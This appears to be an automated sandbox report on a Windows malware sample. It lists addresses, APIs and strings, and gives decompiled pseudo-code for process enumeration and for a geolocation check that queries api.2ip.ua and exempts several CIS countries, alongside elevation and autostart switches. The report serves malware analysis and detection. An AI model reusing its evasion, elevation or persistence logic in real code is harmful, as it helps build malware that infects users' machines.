0x0041acb5
0x0041acb8
0x0041acba
0x0041acc1
0x0041acc8
0x0041acc8
0x0041accb
0x0041acd0
0x0041acd6
0x0041acdb
0x0041acdb
0x0041ace9
0x0041acee
0x0041acf2
0x0041acf5
0x0041ad00
0x0041ad00
0x0041ad02
0x0041ad0d
0x0041ad15
0x0041ad15
0x0041ad18
0x0041ad1b
0x0041ad21
0x0041ad23
0x0041ad26
0x0041ad26
0x0041ad28
0x0041ad29
0x0041ad29
0x0041ad2d
0x0041ad2d
0x0041ad1d
0x0041ad1d
0x0041ad1d
0x0041ad2f
0x0041ad38
0x0041ad3d
0x0041ad3e
0x0041ad3e
0x0041ad43
0x0041ad4d
0x0041ad51
0x0041ad53
0x0041ad55
0x0041ad5c
0x0041ad64
0x0041ad66
0x0041ad71
0x0041ad76
0x0041ad7a
0x0041ad7c
0x0041ad7f
0x0041ad85
0x0041ad87
0x0041ad89
0x0041ad8d
0x0041ad91
0x0041ad96
0x0041ad96
0x0041ad9b
0x0041ada2
0x0041ada9
0x0041adac
0x0041adb0
0x0041adc9
0x0041adcb
0x0041adb2
0x0041adb5
0x0041adb5
0x0041adb6
0x0041adbd
0x0041adc2
0x0041adc2
0x0041adb6
0x0041add4
0x0041adda
0x0041addd
0x0041addf
0x0041ade6
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfb
0x0041ae00
0x0041ae00
0x0041ae03
0x0041ae07
0x0041ae18
0x0041ae20
0x0041ae25
0x0041ae2e
0x0041ae37
0x0041ae3c
0x0041ae41
0x0041ae47
0x0041ae4c
0x0041ae4c
0x0041ae4f
0x0041ae53
0x0041ae64
0x0041ae6c
0x0041ae71
0x0041ae7d
0x0041ae82
0x0041ae87
0x0041ae8d
0x0041ae92
0x0041ae92
0x0041ae95
0x0041ae99
0x0041aeaa
0x0041aeb2
0x0041aeb7
0x0041aec3
0x0041aec8
0x0041aecd
0x0041aed3
0x0041aed8
0x0041aed8
0x0041aedb
0x0041aedf
0x0041aef0
0x0041aef8
0x0041aefd
0x0041af09
0x0041af0e
0x0041af13
0x0041af19
0x0041af1e
0x0041af1e
0x0041af21
0x0041af25
0x0041af36
0x0041af3e
0x0041af43
0x0041af4f
0x0041af54
0x0041af59
0x0041af5f
0x0041af64
0x0041af64
0x0041af67
0x0041af6b
0x0041af7c
0x0041af84
0x0041af89
0x0041af95
0x0041af9a
0x0041af9f
0x0041afa5
0x0041afaa
0x0041afaa
0x0041afad
0x0041afb1
0x0041afc2
0x0041afca
0x0041afcf
0x0041afdb
0x0041afe0
0x0041afe5
0x0041afeb
0x0041aff0
0x0041aff0
0x0041affc
0x0041b00e
0x0041b01a
0x0041b020
0x0041b029
0x0041b037
0x0041b045
0x0041b04c
0x0041b04c
0x0041b054
0x0041b05d
0x0041b06b
0x0041b077
0x0041b080
0x0041b08e
0x0041b09a
0x0041b0a3
0x0041b0b1
0x0041b0bd
0x0041b0c6
0x0041b0d4
0x0041b0e0
0x0041b0e9
0x0041b0f7
0x0041b103
0x0041b10c
0x0041b111
0x0041b111
0x0041b11b
0x0041b120
0x0041b124
0x0041b12b
0x0041b130
0x0041b136
0x0041b13f
0x0041b13f
0x0041b150
0x0041b159
0x0041b169
0x0041b16e
0x0041b178
0x0041b17d
0x0041b181
0x0041b190
0x0041b19a
0x0041b19f
0x0041b1a0
0x0041b1a0
0x0041b1a9
0x0041b1ba
0x0041b1c4
0x0041b1c9
0x0041b1d3
0x0041b1d8
0x0041b1e5
0x0041b1ee
0x0041b1f3
0x0041b20a
0x0041b21d
0x0041b222
0x0041b224
0x0041b230
0x0041b23b
0x0041b240
0x0041b246
0x0041b251
0x0041b259
0x0041b260
0x0041b269
0x0041b27d
0x0041b28c
0x0041b291
0x0041b297
0x0041b299
0x0041b29f
0x0041b2af
0x0041b2b4
0x0041b2bb
0x0041b2c7
0x0041b2d0
0x0041b2e8
0x0041b2ed
0x0041b2ed
0x0041b230
0x0041b2fd
0x0041b303
0x0041b30c
0x0041b314
0x0041b31d
0x0041b322
0x0041b336
0x0041b33e
0x0041b346
0x0041b34b
0x0041b34d
0x0041b35f
0x0041b369
0x0041b36b
0x0041b374
0x0041b389
0x0041b392
0x0041b3a0
0x0041b3ae
0x0041b3b7
0x0041b3c5
0x0041b3dd
0x0041b3e2
0x0041b3e4
0x0041b3ea
0x0041b3f0
0x0041b3fa
0x0041b40c
0x0041b418
0x0041b41d
0x0041b422
0x0041b428
0x0041b42d
0x0041b43d
0x0041b443
0x0041b449
0x0041b44f
0x0041b45d
0x0041b466
0x0041b47e
0x0041b483
0x0041b483
0x0041b3f0
0x0041b495
0x0041b49a
0x0041b4b3
0x0041b4bb
0x0041b4bd
0x0041b4c5
0x0041b4cd
0x0041b4d7
0x0041b4e7
0x0041b4e9
0x0041b4e9
0x0041b4c5
0x0041b4ed
0x0041b4fe
0x0041b500
0x0041b509
0x0041b510
0x0041b520
0x0041b522
0x0041b524
0x0041b526
0x0041b52e
0x0041b540
0x0041b542
0x0041b542
0x0041b526
0x0041b54e
0x0041b554
0x0041b554
0x0041b510
0x0041b55b
0x0041b560
0x0041b562
0x0041b56b
0x0041b570
0x0041b580
0x0041b582
0x0041b584
0x0041b586
0x0041b58e
0x0041b5a0
0x0041b5a2
0x0041b5a2
0x0041b586
0x0041b5ae
0x0041b5b4
0x0041b5b4
0x0041b570
0x0041b5bb
0x0041b5c2
0x0041b5c7
0x0041b5c9
0x0041b5c9
0x0041b5ce
0x0041b5d0
0x0041b5d3
0x0041b5d3
0x0041b5d9
0x0041b5e4
0x0041b34f
0x0041b34f
0x0041b34f
0x0041b5ed
0x0041b5f9
0x0041b605
0x0041b611
0x0041b61d
0x0041a9d1
0x0041a9d1
0x0041a9d1
0x0041b629
0x0041a624
0x0041a624
0x0041a62a
0x0041a62c
0x00000000
0x0041a632
0x0041a63f
0x0041a652
0x0041a661
0x0041a66f
0x0041a67b
0x0041a686
0x0041a68d
0x0041a697
0x0041a6a2
0x0041a6a9
0x0041a6ac
0x0041a6b0
0x0041a6b2
0x0041a6b2
0x0041a6b4
0x0041a6c3
0x0041a6ce
0x0041a6d9
0x0041a6df
0x0041a6e1
0x0041a6fe
0x0041a6fe
0x00000000
0x0041a6e3
0x0041a6e3
0x0041a6e3
0x0041a6e1
0x0041a62c
0x0041a61e
0x0041a612
0x0041a60a
0x0041b635
0x0041b641
0x0041b64d
0x0041b659
0x0041b666
0x0041a466
0x0041a46d
0x0041a46f
0x0041a47c
0x0041a47c
0x0041a196
0x0041a196
0x0041a19d
0x0041a1a1
0x0041a1a7
0x0041a1b4
0x0041a1bc
0x0041a1c1
0x0041a1c4
0x0041a1c6
0x0041a1ca
0x00000000
0x00000000
0x0041a1df
0x0041a1eb
0x0041a1f3
0x0041a201
0x0041a20b
0x0041a20e
0x0041a217
0x0041a21a
0x0041a21f
0x0041a222
0x0041a226
0x0041a323
0x0041a323
0x0041a328
0x0041a32c
0x0041a32f
0x0041a333
0x0041a337
0x0041a1b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a22e
0x0041a236
0x0041a23b
0x0041a23e
0x0041a240
0x0041a244
0x0041a2d5
0x0041a2da
0x0041a2dd
0x0041a2df
0x0041a2f4
0x0041a2f9
0x0041a2fc
0x0041a2fe
0x0041a313
0x0041a318
0x0041a31b
0x0041a31d
0x0041a361
0x0041a371
0x0041a373
0x0041a380
0x0041a38f
0x0041a395
0x0041a3a3
0x0041a3a5
0x0041a3a7
0x00000000
0x00000000
0x0041a3af
0x0041a3b8
0x0041a3c7
0x0041a3c9
0x00000000
0x0041a3cb
0x0041a3cb
0x0041a3d0
0x0041a3d2
0x0041a3e3
0x0041a3f0
0x0041a3f2
0x0041a3ff
0x0041a3d4
0x0041a3d6
0x0041a3dc
0x00000000
0x0041a3dc
0x0041a3d2
0x00000000
0x0041a3c9
0x0041a406
0x0041a40e
0x0041a41b
0x0041a41d
0x0041a42b
0x0041a436
0x0041a43d
0x0041a44a
0x0041a44c
0x0041a459
0x00000000
0x00000000
0x00000000
0x0041a300
0x0041a300
0x00000000
0x0041a300
0x0041a2e1
0x0041a2e1
0x0041a31f
0x0041a31f
0x00000000
0x0041a31f
0x0041a24a
0x0041a24e
0x0041a25a
0x0041a267
0x0041a282
0x0041a28c
0x0041a293
0x0041a2a8
0x0041a2b2
0x0041a2b9
0x0041a2be
0x0041a2c1
0x0041a2c4
0x0041a2c8
0x00000000
0x0041a2c8
0x00000000
0x0041a244
0x0041a1b4
0x0041a190
0x0041a05f
0x00419fb4
0x00419fb4
0x00419fc1
0x00419fc1
0x00000000

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,007DD0B8,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
runas, xrefs: 0041A6CE
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
F:\, xrefs: 0041B397
<, xrefs: 0041A67B
C:\Windows\, xrefs: 0041AE0F
I:\5d2860c89d774.jpg, xrefs: 0041B32F
x2Q, xrefs: 0041A856
--Task, xrefs: 0041A2CD
%username%, xrefs: 0041B283
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
IsAutoStart, xrefs: 0041A1D0, 0041A273
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
X1P, xrefs: 0041A485
D:\Program Files (x86)\Google\, xrefs: 0041B085
--ForNetRes, xrefs: 0041A22E
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
IsTask, xrefs: 0041A1EE, 0041A299
D:\Program Files\Google\, xrefs: 0041B0EE
--Admin, xrefs: 0041A1B4, 0041A632
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
--Service, xrefs: 0041A30B
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
7P, xrefs: 0041B164
IsNotTask, xrefs: 0041A654
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
x*P, xrefs: 0041ACE4
C:\Program Files\Google\, xrefs: 0041AFB9
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
IsNotAutoStart, xrefs: 0041A645
D:\Windows\, xrefs: 0041AFF3
--AutoStart, xrefs: 0041A2EC
list<T> too long, xrefs: 0041B669, 0041B673

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 34f13b70a32c6367f34f8456cd598a2e0d67abed2481b82cf33b0090aaa2dd5a
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 34f13b70a32c6367f34f8456cd598a2e0d67abed2481b82cf33b0090aaa2dd5a
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00412220() {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				unsigned int _v20;
				unsigned int _v24;
				WCHAR* _v28;
				int _v32;
				char _v36;
				char _v2084;
				char _v43044;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				unsigned int _t40;
				void* _t50;
				struct HINSTANCE__* _t52;
				int _t56;
				signed int _t61;
				struct HINSTANCE__* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				void* _t66;

				E0042F7C0(0xa820);
				_t56 = 0;
				_v32 = 0;
				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
				_t62 = LoadLibraryW(L"kernel32.dll");
				_v8 = GetProcAddress(_t62, "EnumProcesses");
				_v12 = GetProcAddress(_t62, "EnumProcessModules");
				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
				_t37 = _v8;
				if(_t37 == 0) {
					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
					_t64 = _t52;
					_v8 = GetProcAddress(_t64, "EnumProcesses");
					_v12 = GetProcAddress(_t64, "EnumProcessModules");
					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
					_t37 = _v8;
				}
				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
				if(_t38 != 0) {
					_t61 = 0;
					_t40 = _v20 >> 2;
					_v24 = _t40;
					if(_t40 != 0) {
						do {
							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
							if(_t63 != 0) {
								_push( &_v36);
								_push(4);
								_push( &_v8);
								_push(_t63); // executed
								if(_v12() != 0) {
									_v16(_t63, _v8,  &_v2084, 0x400);
									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
									_t66 = _t66 + 8;
									if(_t50 == 0) {
										_t56 = _t56 + 1;
									}
								}
							}
							CloseHandle(_t63);
							_t61 = _t61 + 1;
						} while (_t61 < _v24);
					}
					return _t56;
				} else {
					return 1;
				}
			}

0x00412228
0x0041222f
0x00412232
0x00412253
0x00412262
0x00412272
0x0041227d
0x00412282
0x00412285
0x0041228a
0x00412291
0x00412297
0x004122a7
0x004122b2
0x004122b7
0x004122ba
0x004122ba
0x004122cd
0x004122d1
0x004122e2
0x004122e4
0x004122e7
0x004122ec
0x004122f0
0x00412304
0x00412308
0x0041230d
0x0041230e
0x00412313
0x00412314
0x0041231a
0x0041232c
0x00412339
0x0041233e
0x00412343
0x00412345
0x00412345
0x00412343
0x0041231a
0x00412347
0x0041234d
0x0041234e
0x004122f0
0x0041235b
0x004122d5
0x004122de
0x004122de

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

kernel32.dll, xrefs: 0041224E
EnumProcessModules, xrefs: 0041226C, 004122A1
GetModuleBaseNameW, xrefs: 00412277, 004122AC
EnumProcesses, xrefs: 00412264, 00412299
Psapi.dll, xrefs: 0041228C

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: a611d5a9879eaf53dfc826cc6aff3f8b5b2e7e35405f7696e128a603212a688a
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: a611d5a9879eaf53dfc826cc6aff3f8b5b2e7e35405f7696e128a603212a688a
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040CF10() {
				WCHAR* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				char _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				intOrPtr _v92;
				WCHAR* _v96;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long _v156;
				char _v10395;
				void _v10396;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				void* _t95;
				intOrPtr _t102;
				intOrPtr _t119;
				signed int _t122;
				void* _t128;
				WCHAR* _t129;
				WCHAR* _t131;
				intOrPtr* _t134;
				void* _t135;
				void* _t142;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				void* _t161;

				_push(0xffffffff);
				_push(0x4ca850);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t160;
				E0042F7C0(0x2890);
				_push(_t128);
				_push(_t152);
				_v10396 = 0;
				E0042B420( &_v10395, 0, 0x27ff);
				_t161 = _t160 + 0xc;
				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
				_t149 = _t90;
				_v92 = 7;
				_push(0x1b);
				_v96 = 0;
				_v112 = 0;
				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
				_v8 = 0;
				_t94 =  >=  ? _v112 :  &_v112;
				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
				_t153 = _t95;
				if(_t153 != 0) {
					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
					InternetCloseHandle(_t153);
					InternetCloseHandle(_t149);
					_push(0x10);
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
					_v8 = 1;
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v10396 != 0) {
						_t134 =  &_v10396;
						_t23 = _t134 + 1; // 0x1
						_t146 = _t23;
						do {
							_t102 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t102 != 0);
						_t135 = _t134 - _t146;
					} else {
						_t135 = 0;
					}
					_push(_t135);
					E004156D0(_t128,  &_v40, _t149,  &_v10396);
					_v8 = 2;
					_t106 =  >=  ? _v64 :  &_v64;
					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
						L30:
						_t129 = 0;
					} else {
						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
						if( &_v40 != _t114) {
							if(_v20 >= 0x10) {
								L00422587(_v40);
								_t161 = _t161 + 4;
							}
							_v20 = 0xf;
							_v24 = 0;
							_v40 = 0;
							E00413D40( &_v40, _t156);
						}
						if(_v116 >= 0x10) {
							L00422587(_v136);
							_t161 = _t161 + 4;
						}
						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
							goto L30;
						} else {
							E00413010( &_v40,  &_v88, 0, _t116);
							_t131 = _v72;
							_t151 = 0;
							_v152 = "RU";
							_v148 = "BY";
							_v144 = "UA";
							_v140 = "AZ";
							_v136 = "AM";
							_v132 = "TJ";
							_v128 = "KZ";
							_v124 = "KG";
							_v120 = "UZ";
							_v116 = "SY";
							do {
								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
								if( *_t147 != 0) {
									_t157 = _t147;
									_t61 = _t157 + 1; // 0x500005
									_t142 = _t61;
									do {
										_t119 =  *_t157;
										_t157 = _t157 + 1;
									} while (_t119 != 0);
									_t158 = _t157 - _t142;
								} else {
									_t158 = 0;
								}
								_t144 =  >=  ? _v88 :  &_v88;
								_t121 =  <  ? _t131 : _t158;
								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
								_t161 = _t161 + 4;
								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
									goto L24;
								} else {
									_t129 = 1;
								}
								L26:
								if(_v68 >= 0x10) {
									L00422587(_v88);
									_t161 = _t161 + 4;
								}
								_v68 = 0xf;
								_v72 = 0;
								_v88 = 0;
								goto L31;
								L24:
								_t151 = _t151 + 1;
							} while (_t151 < 9);
							_t129 = 0;
							goto L26;
						}
					}
					L31:
					if(_v20 >= 0x10) {
						L00422587(_v40);
						_t161 = _t161 + 4;
					}
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v44 >= 0x10) {
						L00422587(_v64);
						_t161 = _t161 + 4;
					}
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
				} else {
					_t129 = 0;
				}
				if(_v92 >= 8) {
					L00422587(_v112);
				}
				 *[fs:0x0] = _v16;
				return _t129;
			}

0x0040cf19
0x0040cf1b
0x0040cf20
0x0040cf26
0x0040cf2d
0x0040cf32
0x0040cf33
0x0040cf40
0x0040cf4a
0x0040cf4f
0x0040cf5f
0x0040cf65
0x0040cf67
0x0040cf6e
0x0040cf72
0x0040cf81
0x0040cf85
0x0040cf8e
0x0040cf9e
0x0040cfa6
0x0040cfac
0x0040cfb0
0x0040cfcd
0x0040cfda
0x0040cfdd
0x0040cfdf
0x0040cfe9
0x0040cff0
0x0040cff7
0x0040cffb
0x0040d000
0x0040d00b
0x0040d012
0x0040d019
0x0040d01d
0x0040d023
0x0040d029
0x0040d029
0x0040d030
0x0040d030
0x0040d032
0x0040d033
0x0040d037
0x0040d01f
0x0040d01f
0x0040d01f
0x0040d039
0x0040d044
0x0040d049
0x0040d05c
0x0040d069
0x0040d1cb
0x0040d1cb
0x0040d06f
0x0040d084
0x0040d08b
0x0040d091
0x0040d096
0x0040d09b
0x0040d09b
0x0040d0a2
0x0040d0a9
0x0040d0b0
0x0040d0b4
0x0040d0b4
0x0040d0bd
0x0040d0c5
0x0040d0ca
0x0040d0ca
0x0040d0e1
0x00000000
0x0040d0e7
0x0040d0f1
0x0040d0f6
0x0040d0f9
0x0040d0fb
0x0040d105
0x0040d10f
0x0040d119
0x0040d123
0x0040d12d
0x0040d134
0x0040d13b
0x0040d142
0x0040d149
0x0040d150
0x0040d150
0x0040d15a
0x0040d160
0x0040d162
0x0040d162
0x0040d165
0x0040d165
0x0040d167
0x0040d168
0x0040d16c
0x0040d15c
0x0040d15c
0x0040d15c
0x0040d177
0x0040d17d
0x0040d181
0x0040d186
0x0040d18b
0x00000000
0x0040d1c7
0x0040d1c7
0x0040d1c7
0x0040d1a2
0x0040d1a6
0x0040d1ab
0x0040d1b0
0x0040d1b0
0x0040d1b3
0x0040d1ba
0x0040d1c1
0x00000000
0x0040d19a
0x0040d19a
0x0040d19b
0x0040d1a0
0x00000000
0x0040d1a0
0x0040d0e1
0x0040d1cd
0x0040d1d1
0x0040d1d6
0x0040d1db
0x0040d1db
0x0040d1e2
0x0040d1e9
0x0040d1f0
0x0040d1f4
0x0040d1f9
0x0040d1fe
0x0040d1fe
0x0040d201
0x0040d208
0x0040d20f
0x0040cfb2
0x0040cfb2
0x0040cfb2
0x0040d217
0x0040d21c
0x0040d221
0x0040d22b
0x0040d236

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

Microsoft Internet Explorer, xrefs: 0040CF5A
https://api.2ip.ua/geo.json, xrefs: 0040CF79
"country_code":", xrefs: 0040CFE1

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: cde4b8cead4c16c4b17715eb77caab7b53abcba9a36877814266cb784c35ebad
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: cde4b8cead4c16c4b17715eb77caab7b53abcba9a36877814266cb784c35ebad
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00427B0B(int _a4) {
				void* _t4;

				_t1 =  &_a4; // 0x423b69
				E00427AD7(_t4,  *_t1);
				ExitProcess(_a4);
			}

0x00427b0e
0x00427b11
0x00427b1a

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
